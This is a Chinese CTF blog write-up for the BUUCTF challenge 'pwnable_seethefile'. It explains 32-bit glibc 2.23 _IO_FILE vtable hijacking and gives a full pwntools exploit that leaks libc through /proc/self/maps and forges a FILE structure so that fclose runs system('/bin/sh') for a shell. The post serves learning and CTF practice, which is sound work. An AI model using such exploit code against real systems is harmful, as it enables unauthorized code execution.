(BUUCTF)pwnable_seethefile

最新推荐文章于 2024-07-30 13:30:56 发布
最新推荐文章于 2024-07-30 13:30:56 发布
阅读量367 收藏 10
点赞数 6
分类专栏: pwn_writeup 文章标签: 网络安全 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy1458214551/article/details/135273110
版权

文章目录

前置知识

  • glibc2.23下的_IO_FILE虚表劫持
  • /proc/self/maps文件

整体思路

非常典型的一道glibc2.23下的IO_FILE虚表劫持题(不过是32位)。尽管glibc2.23下的虚表劫持已经是时代的眼泪了,但不妨将其视为高版本glibcIO_FILE利用的基础,一起来回顾一下。

查看程序,可以打开文件,读取到内存,并输出到标准输出流,但是不能打开和输出与flag字符串有关的文件。

此外,菜单的第5项可以覆盖掉文件指针fp,并紧接着就对fp调用了fclose。这种情况时,我们只需要劫持fclose过程中调用的虚表函数指针为system,即可执行system函数。

由此,我们输入5,并将fp的地址写为name的地址(因为这部分我们可以进行控制),随后在name处写/bin/sh\x00(因为最终会调用__close('/bin/sh\x00'))。接下来,在偏移0x94处的地方写一个vtable的地址。这个地址我们如何决定呢?我的方法是,先将system函数写在可控的name的某处,再将vtable的地址反推为构造的system函数的地址减去16*4个地址(这是因为__close函数在vtable中的位置为第16个)。如此一来fclose函数就会执行system('/bin/sh'),从而获得shell

其中需要注意的点:

  • libc的地址可以通过打开/proc/self/maps文件获得,其中self表示当前进程,该文件内容和vmmap显示的信息类似,存放进程的内存信息;

  • fp指针指向的内存全部填充为0会导致程序崩溃,例如偏移0x48处,我这里填写为name地址加上0x10。这种导致崩溃的可以通过调试汇编来看看是为什么导致的(如果你不会,那么很难解IO_FILE相关的题目)

  • BUUCTF上的这道题的libc版本是32位的glibc2.23-0ubuntu5,需要注意

exp

from pwn import *
from LibcSearcher import *

filename = '/1'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
# libc = ELF('/glibc/2.23-0ubuntu11_i386/libc.so.6')
libc = ELF('./libc_32.so.6')

if local:
    sh = process(filename)
else:
    sh = remote('node4.buuoj.cn', 27155)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

choice_words = 'Your choice :'

def open(filename):
    sh.sendlineafter(choice_words, '1')
    sh.sendlineafter('see :', filename)
    
def read():
    sh.sendlineafter(choice_words, '2')

def write():
    sh.sendlineafter(choice_words, '3')

def close():
    sh.sendlineafter(choice_words, '4')

def quit(name):
    sh.sendlineafter(choice_words, '5')
    sh.sendlineafter('name :', name)


def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)

# 32位下,vtable的偏移是0x94,而不是64位的0xd8。
# 实际上,32位下很多偏移最好都去调试一下看下究竟是多少
vtable_offset = 0x94

# 通过/proc/self/maps,可以查看当前进程的vmmap信息,其中包括程序基地址、libc地址等等
open('/proc/self/maps')
read()
write()
sh.recvuntil('[heap]')
libc.address = int(sh.recvuntil('-', drop=True).strip().decode(), 16) + 0x1000
leak_info('libc.address', libc.address)
# debug()
close()

# 上面已经泄露了程序基地址。我们通过劫持vtable中的close函数来getshell。
file_addr = 0x0804B260
lock_addr = file_addr + 0x10  
vtable_addr = file_addr + 0x24 - 16*4
leak_info('lock_addr', lock_addr)
leak_info('system', libc.sym['system'])
payload = b'/bin/sh\x00' + b'\x00'*0x18 + p32(file_addr) + p32(0) + p32(libc.sym['system'])
payload = payload.ljust(0x48, b'\x00') + p32(lock_addr)
payload = payload.ljust(vtable_offset, b'\x00')
payload += p32(vtable_addr)
# debug()
quit(payload)
# pause()
sh.interactive()
# pause()

参考文献

IO FILE 之fclose 详解 - 先知社区 (aliyun.com)

LtfallQwQ
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4162
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
pwnable.tw 9 seethefile [250 pts]
qq_42192672的博客
12-04 773
之前做了五道题直接做自闭了,各种手写shellcode,学到了很多姿势,这是一道文件题,没接触过,来挑战一下…… no canary found!!!!!! 拖进IDA分析 一共有五个功能 有一个明显的栈溢出 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节...
劫持vtable修改程序执行流——pwnable seethefile
weixin_46521144的博客
07-22 345
前置知识 vtable vtable是和file结构体并列的一段内容,是函数指针数组,其中包含了对file的一些操作函数。 以下来自ctf-wiki 在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8 以下是vtable的实际结构,如图所示,我们需要关注的是close部分。也就是关闭文件时将会调用的函数。 ## 劫持原理 以下内容摘自https://www.jianshu.com/p/2e00afb01606 分析close函数,最关键的利用点在这里 注意
【pwnable.tw】 seethefile
weixin_30432179的博客
09-20 110
一开始特别懵的一道题。 main函数中一共4个功能,openfile、readfile、writefile、closefile。 其中,在最后退出时有一个明显的溢出,是scanf("%s",&name); name位于bss段上,name下面有一个fp用于存储文件指针,可以被覆盖。 再看其他函数: openfile.只有一个简单的输入并打开,保存文件指针在bss段上的fp...
pwnable.tw seethefile 经验总结
qq_43189757的博客
11-13 523
关于伪造FILE结构体来getshell的题目, 又学到了点知识 程序逻辑分析: 程序的逻辑简单,简单的打开文件读取文件的操作, 但是对于flag进行了严格的过滤, 无法直接通过打开flag文件来读取flag, 在switch分支5处输入的name存在明显的溢出, 观察发现fp就在name地址下方, 可以通过溢出来控制fp指针, 接下来就是伪造fake FILE结构体了 原理: fp 指针指向的...
pwnable.kr seethefile
doudoudedi
12-14 242
忙里偷闲-------一道伪造_IO_file结构体的题目 发现文件结构体指针直接放在bss段上我们可以修改,很明显就是让我们伪造_IO_FILE结构体了,根据程序逻辑我们需要仔细阅读fclose函数分析源码ing _IO_new_fclose (_IO_FILE *fp) { int status; CHECK_FILE(fp, EOF); #if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) /* We desperately try to help
BUUCTF pwnable_start
qq_63528163的博客
09-04 122
题解
BUUCTF Pwn pwnable_asm
ChaoYue_miku的博客
07-10 359
64位ELF 开启了沙箱,允许使用open()、read()、write()三个函数。  主要逻辑基本都在main函数当中,首先用函数映射出一块内存空间,起始地址为,大小为。  flag文件位于相同根目录下,可以利用这一函数试探文件名既具体位置。 核心思想是利用首先利用函数打开flag,然后利用函数将flag读入刚才映射好的内存空间中,最后利用函数写flag到屏幕上即可。根据刚才的分析,可以编写如下的 0x03 运行exp 本地调试好之后,远程连接靶场,运行flag{7be081e2-506e-423
buuctf pwnable_orw
qq_42728977的博客
04-12 331
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8354
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1048
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
确保汽车电子电气系统安全:ISO 26262合规性实施指南
最新发布
yayuanjingkeji的博客
07-30 353
阅读和理解ISO 26262的各个部分,包括通则、管理功能安全、概念阶段、系统级功能安全、硬件级功能安全、软件级功能安全和生产、运营、维护、报废阶段的功能安全要求。- 建立一个有效的FSM,包括安全管理体系、功能安全计划、功能安全评估、危害分析和风险评估(HARA)、安全概念(FSC)和技术安全需求(TSR)。- 确定适用的ASIL(汽车安全完整性等级)级别,ASIL分为A、B、C、D四个级别,等级越高,安全要求越严格。- 在运营和维护阶段,实施有效的监控和维护程序,确保系统的持续安全运行。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 727
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络操作,事件处理,加密,数据库处理,snmp监视,队列,信号量,解析器和XML处理程序等。根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值